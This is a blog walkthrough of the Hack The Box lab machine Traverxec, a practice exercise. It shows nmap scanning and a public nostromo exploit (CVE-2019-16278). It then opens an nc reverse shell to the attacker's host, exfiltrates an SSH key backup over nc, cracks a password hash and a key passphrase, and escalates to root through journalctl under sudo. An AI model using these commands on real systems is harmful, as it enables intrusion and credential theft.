<!DOCTYPE html>
<html lang="en-us">
    <head><meta charset='utf-8'>
<meta name='viewport' content='width=device-width, initial-scale=1'><meta name='description' content='[*] INDEX:  BOX INFO GAINING ACCESS PRIVILEGE ESCALATION  [&#43;] BOX INFO :computer: : Operative System : Linux :penguin:Difficulty : Easy :waxing_gibbous_moon:Owner : jkrIP : 10.10.10.165[&#43;] PART 1 - GAIN ACCESS The first step is scanning machine&amp;rsquo;s ports with nmap:
 nmap -p- -T5 -n 10.10.10.165
 But this is running quite slow, so we&amp;rsquo;ll be seeping up the scan a bit :
 nmap -sS &amp;ndash;min-rate 5000 &amp;ndash;open -Pn -p- 10.'><title>[9] Traverxec Hackthebox</title>

<link rel='canonical' href='https://example.com/posts/traverxec-hackthebox/'>

<link rel="stylesheet" href="/scss/style.min.css"><meta property='og:title' content='[9] Traverxec Hackthebox'>
<meta property='og:description' content='[*] INDEX:  BOX INFO GAINING ACCESS PRIVILEGE ESCALATION  [&#43;] BOX INFO :computer: : Operative System : Linux :penguin:Difficulty : Easy :waxing_gibbous_moon:Owner : jkrIP : 10.10.10.165[&#43;] PART 1 - GAIN ACCESS The first step is scanning machine&amp;rsquo;s ports with nmap:
 nmap -p- -T5 -n 10.10.10.165
 But this is running quite slow, so we&amp;rsquo;ll be seeping up the scan a bit :
 nmap -sS &amp;ndash;min-rate 5000 &amp;ndash;open -Pn -p- 10.'>
<meta property='og:url' content='https://example.com/posts/traverxec-hackthebox/'>
<meta property='og:site_name' content='Maikypedia'>
<meta property='og:type' content='article'><meta property='article:section' content='Posts' /><meta property='article:published_time' content='2021-03-26T00:13:37&#43;01:00'/><meta property='article:modified_time' content='2021-03-26T00:13:37&#43;01:00'/>
<meta name="twitter:title" content="[9] Traverxec Hackthebox">
<meta name="twitter:description" content="[*] INDEX:  BOX INFO GAINING ACCESS PRIVILEGE ESCALATION  [&#43;] BOX INFO :computer: : Operative System : Linux :penguin:Difficulty : Easy :waxing_gibbous_moon:Owner : jkrIP : 10.10.10.165[&#43;] PART 1 - GAIN ACCESS The first step is scanning machine&amp;rsquo;s ports with nmap:
 nmap -p- -T5 -n 10.10.10.165
 But this is running quite slow, so we&amp;rsquo;ll be seeping up the scan a bit :
 nmap -sS &amp;ndash;min-rate 5000 &amp;ndash;open -Pn -p- 10.">
    </head>
    <body class="article-page keep-sidebar">
    <script>
        (function() {
            const colorSchemeKey = 'StackColorScheme';
            if(!localStorage.getItem(colorSchemeKey)){
                localStorage.setItem(colorSchemeKey, "auto");
            }
        })();
    </script><script>
    (function() {
        const colorSchemeKey = 'StackColorScheme';
        const colorSchemeItem = localStorage.getItem(colorSchemeKey);
        const supportDarkMode = window.matchMedia('(prefers-color-scheme: dark)').matches === true;

        if (colorSchemeItem == 'dark' || colorSchemeItem === 'auto' && supportDarkMode) {
            

            document.body.dataset.scheme = 'dark';
        } else {
            document.body.dataset.scheme = 'light';
        }
    })();
</script><div class="container main-container flex on-phone--column extended ">
            <aside class="sidebar left-sidebar sticky">
    <button class="hamburger hamburger--spin" type="button" id="toggle-menu" aria-label="Toggle Menu">
        <span class="hamburger-box">
            <span class="hamburger-inner"></span>
        </span>
    </button>

    <header class="site-info">
        
            <figure class="site-avatar">
                
                    
                    
                    
                        
                        <img src="/img/maiky_hue62232bf39c5ba17479eab350663cd81_63325_300x0_resize_q75_box.jpeg" width="300"
                            height="300" class="site-logo" loading="lazy" alt="Avatar">
                    
                

                
                    <span class="emoji">🕵️</span>
                
            </figure>
        
        <h1 class="site-name"><a href="https://example.com">Maikypedia</a></h1>
        <h2 class="site-description">I&#39;m Maiky...</h2>
    </header>

    <ol class="menu" id="main-menu">
        
        
        

        <li >
            <a href='/posts'>
                
                    <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-home" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <polyline points="5 12 3 12 12 3 21 12 19 12" />
  <path d="M5 12v7a2 2 0 0 0 2 2h10a2 2 0 0 0 2 -2v-7" />
  <path d="M9 21v-6a2 2 0 0 1 2 -2h2a2 2 0 0 1 2 2v6" />
</svg>



                
                <span>Home</span>
            </a>
        </li>
        
        

        <li >
            <a href='/categories/hack-the-box'>
                
                    <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="24" height="24" preserveAspectRatio="xMidYMid meet" viewBox="0 0 24 24" style="-ms-transform: rotate(360deg); -webkit-transform: rotate(360deg); transform: rotate(360deg);"><path d="M11.996 0a1.119 1.119 0 0 0-.057.003a.9.9 0 0 0-.236.05a.907.907 0 0 0-.165.079L1.936 5.675a.889.889 0 0 0-.445.77V17.556a.889.889 0 0 0 .47.784l9.598 5.541l.054.029v.002a.857.857 0 0 0 .083.035l.012.004c.028.01.056.018.085.024c.01.001.011.003.016.004a.93.93 0 0 0 .296.015a.683.683 0 0 0 .086-.015c.01 0 .011-.002.016-.004a.94.94 0 0 0 .085-.024l.012-.004a.882.882 0 0 0 .083-.035v-.002a1.086 1.086 0 0 0 .054-.029l9.599-5.541a.889.889 0 0 0 .469-.784V6.48l-.001-.026v-.008a.889.889 0 0 0-.312-.676l-.029-.024c0-.002-.01-.005-.01-.007a.899.899 0 0 0-.107-.07L12.453.127A.887.887 0 0 0 11.99 0zm.01 2.253c.072 0 .144.019.209.056l6.537 3.774a.418.418 0 0 1 0 .724l-6.537 3.774a.418.418 0 0 1-.418 0L5.26 6.807a.418.418 0 0 1 0-.724l6.537-3.774a.42.42 0 0 1 .209-.056zm-8.08 6.458a.414.414 0 0 1 .215.057l6.524 3.766a.417.417 0 0 1 .208.361v7.533a.417.417 0 0 1-.626.361l-6.523-3.766a.417.417 0 0 1-.209-.362V9.13c0-.241.196-.414.41-.418zm16.16 0c.215.004.41.177.41.418v7.532c0 .15-.08.287-.208.362l-6.524 3.766a.417.417 0 0 1-.626-.361v-7.533c0-.149.08-.286.209-.36l6.523-3.767a.415.415 0 0 1 .216-.057z" fill="#626262"/><rect x="0" y="0" width="24" height="24" fill="rgba(0, 0, 0, 0)" /></svg>
                
                <span>HackTheBox</span>
            </a>
        </li>
        
        

        <li >
            <a href='https://www.instagram.com/c.pasttor/'>
                
                    <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"><path d="M12 2.163c3.204 0 3.584.012 4.85.07 3.252.148 4.771 1.691 4.919 4.919.058 1.265.069 1.645.069 4.849 0 3.205-.012 3.584-.069 4.849-.149 3.225-1.664 4.771-4.919 4.919-1.266.058-1.644.07-4.85.07-3.204 0-3.584-.012-4.849-.07-3.26-.149-4.771-1.699-4.919-4.92-.058-1.265-.07-1.644-.07-4.849 0-3.204.013-3.583.07-4.849.149-3.227 1.664-4.771 4.919-4.919 1.266-.057 1.645-.069 4.849-.069zm0-2.163c-3.259 0-3.667.014-4.947.072-4.358.2-6.78 2.618-6.98 6.98-.059 1.281-.073 1.689-.073 4.948 0 3.259.014 3.668.072 4.948.2 4.358 2.618 6.78 6.98 6.98 1.281.058 1.689.072 4.948.072 3.259 0 3.668-.014 4.948-.072 4.354-.2 6.782-2.618 6.979-6.98.059-1.28.073-1.689.073-4.948 0-3.259-.014-3.667-.072-4.947-.196-4.354-2.617-6.78-6.979-6.98-1.281-.059-1.69-.073-4.949-.073zm0 5.838c-3.403 0-6.162 2.759-6.162 6.162s2.759 6.163 6.162 6.163 6.162-2.759 6.162-6.163c0-3.403-2.759-6.162-6.162-6.162zm0 10.162c-2.209 0-4-1.79-4-4 0-2.209 1.791-4 4-4s4 1.791 4 4c0 2.21-1.791 4-4 4zm6.406-11.845c-.796 0-1.441.645-1.441 1.44s.645 1.44 1.441 1.44c.795 0 1.439-.645 1.439-1.44s-.644-1.44-1.439-1.44z"/></svg>
                
                <span>Instagram</span>
            </a>
        </li>
        
        

        <li >
            <a href='https://twitter.com/Maiky_py'>
                
                    <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"><path d="M24 4.557c-.883.392-1.832.656-2.828.775 1.017-.609 1.798-1.574 2.165-2.724-.951.564-2.005.974-3.127 1.195-.897-.957-2.178-1.555-3.594-1.555-3.179 0-5.515 2.966-4.797 6.045-4.091-.205-7.719-2.165-10.148-5.144-1.29 2.213-.669 5.108 1.523 6.574-.806-.026-1.566-.247-2.229-.616-.054 2.281 1.581 4.415 3.949 4.89-.693.188-1.452.232-2.224.084.626 1.956 2.444 3.379 4.6 3.419-2.07 1.623-4.678 2.348-7.29 2.04 2.179 1.397 4.768 2.212 7.548 2.212 9.142 0 14.307-7.721 13.995-14.646.962-.695 1.797-1.562 2.457-2.549z"/></svg>
                
                <span>Twitter</span>
            </a>
        </li>
        
        

        <li >
            <a href='/about/whoami'>
                
                    <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-user" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="12" cy="7" r="4" />
  <path d="M6 21v-2a4 4 0 0 1 4 -4h4a4 4 0 0 1 4 4v2" />
</svg>



                
                <span>Whoami</span>
            </a>
        </li>
        

        
            <li id="dark-mode-toggle">
                <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-toggle-left" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="8" cy="12" r="2" />
  <rect x="2" y="6" width="20" height="12" rx="6" />
</svg>



                <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-toggle-right" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="16" cy="12" r="2" />
  <rect x="2" y="6" width="20" height="12" rx="6" />
</svg>



                <span>Dark Mode</span>
            </li>
        
    </ol>
</aside>

            <main class="main full-width">
    <article class="main-article">
    <header class="article-header">

    <div class="article-details">
    
    <header class="article-category">
        
            <a href="/categories/hack-the-box/" >
                Hack-The-Box
            </a>
        
    </header>
    

    <h2 class="article-title">
        <a href="/posts/traverxec-hackthebox/">[9] Traverxec Hackthebox</a>
    </h2>

    <footer class="article-time">
        <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-clock" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="12" cy="12" r="9" />
  <polyline points="12 7 12 12 15 15" />
</svg>



        <time class="article-time--published">Mar 26, 2021</time>
    </footer></div>
</header>

    <section class="article-content">
    <p><img src="/static/HACKING/traverxec-index.jpg" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<h1 id="-index">[*] INDEX:</h1>
<ul>
<li><a class="link" href="#-box-info--" >BOX INFO</a></li>
<li><a class="link" href="#-part-1---gain-access" >GAINING ACCESS</a></li>
<li><a class="link" href="#-part-2---privesc" >PRIVILEGE ESCALATION</a></li>
</ul>
<h1 id="-box-info-computer-">[+] BOX INFO :computer: :</h1>
<pre><code>Operative System : Linux :penguin:
Difficulty : Easy :waxing_gibbous_moon:
Owner : jkr
IP : 10.10.10.165
</code></pre><h1 id="-part-1---gain-access">[+] PART 1 - GAIN ACCESS</h1>
<p>The first step is scanning machine&rsquo;s ports with nmap:</p>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=nmap&#43;-p-&#43;-T5&#43;-n&#43;10.10.10.165"  target="_blank" rel="noopener"
    >nmap -p- -T5 -n 10.10.10.165</a></p>
</blockquote>
<p>But this is running quite slow, so we&rsquo;ll be seeping up the scan a bit :</p>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=nmap&#43;-sS&#43;--min-rate&#43;5000&#43;--open&#43;-Pn&#43;-p-&#43;10.10.10.165"  target="_blank" rel="noopener"
    >nmap -sS &ndash;min-rate 5000 &ndash;open -Pn -p- 10.10.10.165</a></p>
</blockquote>
<pre><code>PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
</code></pre><p>Once seen open ports, let&rsquo;s get a deeper scan :</p>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=nmap&#43;-sS&#43;-sC&#43;-sV&#43;-p22%2C80&#43;10.10.10.165"  target="_blank" rel="noopener"
    >nmap -sS -sC -sV -p22,80 10.10.10.165</a></p>
</blockquote>
<pre><code>PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c (RSA)
|   256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA)
|_  256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce (ED25519)
80/tcp open  http    nostromo 1.9.6
|_http-server-header: nostromo 1.9.6
|_http-title: TRAVERXEC
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
</code></pre><p>Here we can just point out the http server which has nostromo service, so, let&rsquo;s check it :</p>
<p><img src="/static/HACKING/traverxec-1.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>Let&rsquo;s try to fuzz it, I&rsquo;ll be using <code>wfuzz</code> :</p>
<blockquote>
<p>wfuzz -c -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt &ndash;hc=404 -L -u http://10.10.10.165/FUZZ</p>
</blockquote>
<pre><code>********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.10.165/FUZZ
Total requests: 207643

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                           
=====================================================================
</code></pre><p>Unfortunately we&rsquo;re not able to fuzz this website, so let&rsquo;s look for a <code>nostromo 1.9.6</code> vulnerability :</p>
<p>In this nostromo version we can get a <a class="link" href="https://raw.githubusercontent.com/ianxtianxt/CVE-2019-16278/master/cve-2019-16278.py"  target="_blank" rel="noopener"
    >exploit</a> from github written in python3, let&rsquo;s run it :</p>
<blockquote>
<p>python3 cve-2019-16278.py 10.10.10.165 80 whoami</p>
</blockquote>
<pre><code>www-data
</code></pre><p>Oh! This works, let&rsquo;s get a reverse shell from <a class="link" href="https://ironhackers.es/en/herramientas/reverse-shell-cheat-sheet/"  target="_blank" rel="noopener"
    >ironhackers</a> :</p>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=rlwrap&#43;nc&#43;-lvnp&#43;8989"  target="_blank" rel="noopener"
    >rlwrap nc -lvnp 8989</a></p>
</blockquote>
<blockquote>
<p>python3 cve-2019-16278.py 10.10.10.165 80 &lsquo;nc -e /bin/sh 10.10.14.29 8989&rsquo;</p>
</blockquote>
<p><img src="/static/HACKING/traverxec-2.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>Nice, let&rsquo;s ennumerate, in my case I&rsquo;ll be using <a class="link" href="https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh"  target="_blank" rel="noopener"
    >linpeas</a> :</p>
<h3 id="from-our-local-machine-">From our local machine :</h3>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=wget&#43;https%3A%2F%2Fraw.githubusercontent.com%2Fcarlospolop%2Fprivilege-escalation-awesome-scripts-suite%2Fmaster%2FlinPEAS%2Flinpeas.sh"  target="_blank" rel="noopener"
    >wget https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh</a></p>
</blockquote>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=python3&#43;-m&#43;http.server"  target="_blank" rel="noopener"
    >python3 -m http.server</a></p>
</blockquote>
<h3 id="from-the-victim-machine-">From the victim machine :</h3>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=wget&#43;http%3A%2F%2F10.10.14.29%3A8000%2Flinpeas.sh"  target="_blank" rel="noopener"
    >wget http://10.10.14.29:8000/linpeas.sh</a></p>
</blockquote>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=chmod&#43;%2Bx&#43;linpeas.sh"  target="_blank" rel="noopener"
    >chmod +x linpeas.sh</a></p>
</blockquote>
<blockquote>
<p>./linpeas.sh</p>
</blockquote>
<p><img src="/static/HACKING/traverxec-3.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>With linpeash we can get a lot of info, let&rsquo;s see if we can get something interesting :</p>
<p>Here we get some users :</p>
<p><img src="/static/HACKING/traverxec-4.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>Here I found david&rsquo;s password hash, this is interesting :</p>
<p><img src="/static/HACKING/traverxec-5.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>Let&rsquo;s crack it with hashcat, let&rsquo;s what <a class="link" href="https://hashcat.net/wiki/doku.php?id=example_hashes"  target="_blank" rel="noopener"
    >kind of hash</a> is it :</p>
<p><img src="/static/HACKING/traverxec-6.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>Once known the kind of hash let&rsquo;s crack it :</p>
<blockquote>
<p>hashcat -a 0 -m 500 hash /usr/share/wordlists/rockyou.txt</p>
</blockquote>
<blockquote>
<p>hashcat -a 0 -m 500 hash_to_crack &ndash;show</p>
</blockquote>
<pre><code>$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/:Nowonly4me
</code></pre><p>Yes :smile: ! Let&rsquo;s login with this through ssh :</p>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=ssh&#43;david%4010.10.10.165"  target="_blank" rel="noopener"
    >ssh david@10.10.10.165</a></p>
</blockquote>
<p><img src="/static/HACKING/traverxec-7.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>:flushed: Oh, we can&rsquo;t login&hellip; Let&rsquo;s keep ennumerating&hellip;</p>
<p>Inside /var I found nostromo/ :</p>
<pre><code>conf  htdocs  icons  logs
</code></pre><p>And in conf I read this :</p>
<blockquote>
<p>cat nhttpd.conf</p>
</blockquote>
<pre><code># MAIN [MANDATORY]

servername              traverxec.htb
serverlisten            *
serveradmin             david@traverxec.htb
serverroot              /var/nostromo
servermimes             conf/mimes
docroot                 /var/nostromo/htdocs
docindex                index.html

# LOGS [OPTIONAL]

logpid                  logs/nhttpd.pid

# SETUID [RECOMMENDED]

user                    www-data

# BASIC AUTHENTICATION [OPTIONAL]

htaccess                .htaccess
htpasswd                /var/nostromo/conf/.htpasswd

# ALIASES [OPTIONAL]

/icons                  /var/nostromo/icons

# HOMEDIRS [OPTIONAL]

homedirs                /home
homedirs_public         public_www
</code></pre><p>I don&rsquo;t have perms in /home/david but I can go to /home/david/public_www because as it says, it&rsquo;s a public directory :</p>
<p>Inside there we get a ssh backup file in the protected-file-area directory, let&rsquo;s <a class="link" href="https://ironhackers.es/en/cheatsheet/transferir-archivos-post-explotacion-cheatsheet/"  target="_blank" rel="noopener"
    >download</a> it :</p>
<h3 id="from-our-machine-">From our machine :</h3>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=nc&#43;-lvp&#43;4444&#43;%3E&#43;backup-ssh-identity-files.tgz"  target="_blank" rel="noopener"
    >nc -lvp 4444 &gt; backup-ssh-identity-files.tgz</a></p>
</blockquote>
<h3 id="from-the-victim-machine--1">From the victim machine :</h3>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=nc&#43;10.10.14.29&#43;4444&#43;-w&#43;3&#43;%3C&#43;backup-ssh-identity-files.tgz"  target="_blank" rel="noopener"
    >nc 10.10.14.29 4444 -w 3 &lt; backup-ssh-identity-files.tgz</a></p>
</blockquote>
<p>And now we have to decompress the file :</p>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=tar&#43;-xvzf&#43;backup-ssh-identity-files.tgz"  target="_blank" rel="noopener"
    >tar -xvzf backup-ssh-identity-files.tgz</a></p>
</blockquote>
<pre><code>home/david/.ssh/
home/david/.ssh/authorized_keys
home/david/.ssh/id_rsa
home/david/.ssh/id_rsa.pub
</code></pre><p>Let&rsquo;s try now to login with the id_rsa :</p>
<p><img src="/static/HACKING/traverxec-8.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>Didn&rsquo;t work :pensive: (I tried with Nowonly4me too) , let&rsquo;s crack de id_rsa, I&rsquo;ll be using ssh2john.py to turn the id_rsa into a hash and then crack it with john to get the passphrase :</p>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=python&#43;%2Fusr%2Fshare%2Fjohn%2Fssh2john.py&#43;id_rsa&#43;%3E&#43;id_rsa.hash"  target="_blank" rel="noopener"
    >python /usr/share/john/ssh2john.py id_rsa &gt; id_rsa.hash</a></p>
</blockquote>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=john&#43;--wordlist%3D%2Fusr%2Fshare%2Fwordlists%2Frockyou.txt&#43;id_rsa.hash"  target="_blank" rel="noopener"
    >john &ndash;wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash</a></p>
</blockquote>
<p><img src="/static/HACKING/traverxec-9.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>Now let&rsquo;s login :</p>
<p><img src="/static/HACKING/traverxec-10.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>Awesome 😊 !</p>
<h1 id="-part-2---privesc">[+] PART 2 - PRIVESC</h1>
<p>First of all let&rsquo;s check if we can run sudo or when can we run it :</p>
<pre><code class="language-ssh" data-lang="ssh">david@traverxec:~$ sudo -l
[sudo] password for david: 
Sorry, try again.
</code></pre><p>But we don&rsquo;t have david&rsquo;s pass, let&rsquo;s look inside his directory :</p>
<p><img src="/static/HACKING/traverxec-11.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>That&rsquo;s interesting, let&rsquo;s read it :</p>
<div class="highlight"><pre class="chroma"><code class="language-bash" data-lang="bash"><span class="cp">#!/bin/bash
</span><span class="cp"></span>
cat /home/david/bin/server-stats.head
<span class="nb">echo</span> <span class="s2">&#34;Load: `/usr/bin/uptime`&#34;</span>
<span class="nb">echo</span> <span class="s2">&#34; &#34;</span>
<span class="nb">echo</span> <span class="s2">&#34;Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`&#34;</span>
<span class="nb">echo</span> <span class="s2">&#34;Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/w
</span><span class="s2">echo &#34;</span> <span class="s2">&#34;
</span><span class="s2">echo &#34;</span>Last <span class="m">5</span> journal log lines:<span class="s2">&#34;
</span><span class="s2">/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat
</span></code></pre></div><p>Hmm so this is running <code>/usr/bin/journalctl</code>, as we can see in <a class="link" href="https://gtfobins.github.io/gtfobins/journalctl/"  target="_blank" rel="noopener"
    >gtfobins</a> we can get a shell with sudo :</p>
<p><img src="/static/HACKING/traverxec-12.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>So let&rsquo;s run this :</p>
<blockquote>
<p>/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service</p>
</blockquote>
<p><img src="/static/HACKING/traverxec-13.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>Now as gtfobin said, we write !/bin/sh :</p>
<p><img src="/static/HACKING/traverxec-14.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<h1 id="thanks-for-reading--">THANKS FOR READING 😊 !!</h1>

</section>


    <footer class="article-footer">
    

    
    <section class="article-copyright">
        <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-copyright" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="12" cy="12" r="9" />
  <path d="M14.5 9a3.5 4 0 1 0 0 6" />
</svg>



        <span>Licensed under CC BY-NC-SA 4.0</span>
    </section>
    </footer>

    
</article>

     
        
    <div class="disqus-container">
    <div id="disqus_thread"></div>
<script type="application/javascript">
    var disqus_config = function () {
    
    
    
    };
    (function() {
        if (["localhost", "127.0.0.1"].indexOf(window.location.hostname) != -1) {
            document.getElementById('disqus_thread').innerHTML = 'Disqus comments not available by default when the website is previewed locally.';
            return;
        }
        var d = document, s = d.createElement('script'); s.async = true;
        s.src = '//' + "hugo-theme-stack" + '.disqus.com/embed.js';
        s.setAttribute('data-timestamp', +new Date());
        (d.head || d.body).appendChild(s);
    })();
</script>
<noscript>Please enable JavaScript to view the <a href="https://disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript>
<a href="https://disqus.com" class="dsq-brlink">comments powered by <span class="logo-disqus">Disqus</span></a>
</div>

<style>
    .disqus-container {
        background-color: var(--card-background);
        border-radius: var(--card-border-radius);
        box-shadow: var(--shadow-l1);
        padding: var(--card-padding);
    }
</style>

<script>
    window.addEventListener('onColorSchemeChange', (e) => {
        if (DISQUS) {
            DISQUS.reset({
                reload: true
            });
        }
    })
</script>

    

    <footer class="site-footer">
    <section class="copyright">
        &copy; 
        
            2020 - 
        
        2021 Maikypedia
    </section>
    
    <section class="powerby">
        Built with <a href="https://gohugo.io/" target="_blank" rel="noopener">Hugo</a> <br />
        Theme <b><a href="https://github.com/CaiJimmy/hugo-theme-stack" target="_blank" rel="noopener" data-version="2.3.0">Stack</a></b> designed by <a href="https://jimmycai.com" target="_blank" rel="noopener">Jimmy</a>
    </section>
</footer>

    
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">

    
    <div class="pswp__bg"></div>

    
    <div class="pswp__scroll-wrap">

        
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>

        
        <div class="pswp__ui pswp__ui--hidden">

            <div class="pswp__top-bar">

                

                <div class="pswp__counter"></div>

                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>

                <button class="pswp__button pswp__button--share" title="Share"></button>

                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>

                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>

                
                
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                        <div class="pswp__preloader__cut">
                            <div class="pswp__preloader__donut"></div>
                        </div>
                    </div>
                </div>
            </div>

            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div>
            </div>

            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>

            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>

            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>

        </div>

    </div>

</div><script 
                src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.min.js"integrity="sha256-ePwmChbbvXbsO02lbM3HoHbSHTHFAeChekF1xKJdleo="crossorigin="anonymous"
                defer="true"
                >
            </script><script 
                src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe-ui-default.min.js"integrity="sha256-UKkzOn/w1mBxRmLLGrSeyB4e1xbrp4xylgAWb3M42pU="crossorigin="anonymous"
                defer="true"
                >
            </script><link 
                rel="stylesheet" 
                href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/default-skin/default-skin.css"integrity="sha256-c0uckgykQ9v5k&#43;IqViZOZKc47Jn7KQil4/MP3ySA3F8="crossorigin="anonymous"
            ><link 
                rel="stylesheet" 
                href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.css"integrity="sha256-SBLU4vv6CA6lHsZ1XyTdhyjJxCjPif/TRkjnsyGAGnE="crossorigin="anonymous"
            >

            </main>
        </div>
        <script 
                src="https://cdn.jsdelivr.net/npm/node-vibrant@3.1.5/dist/vibrant.min.js"integrity="sha256-5NovOZc4iwiAWTYIFiIM7DxKUXKWvpVEuMEPLzcm5/g="crossorigin="anonymous"
                defer="false"
                >
            </script><script type="text/javascript" src="/ts/main.js" defer></script>
<script>
    (function () {
        const customFont = document.createElement('link');
        customFont.href = "https://fonts.googleapis.com/css2?family=Lato:wght@300;400;700&display=swap";

        customFont.type = "text/css";
        customFont.rel = "stylesheet";

        document.head.appendChild(customFont);
    }());
</script>

    </body>
</html>
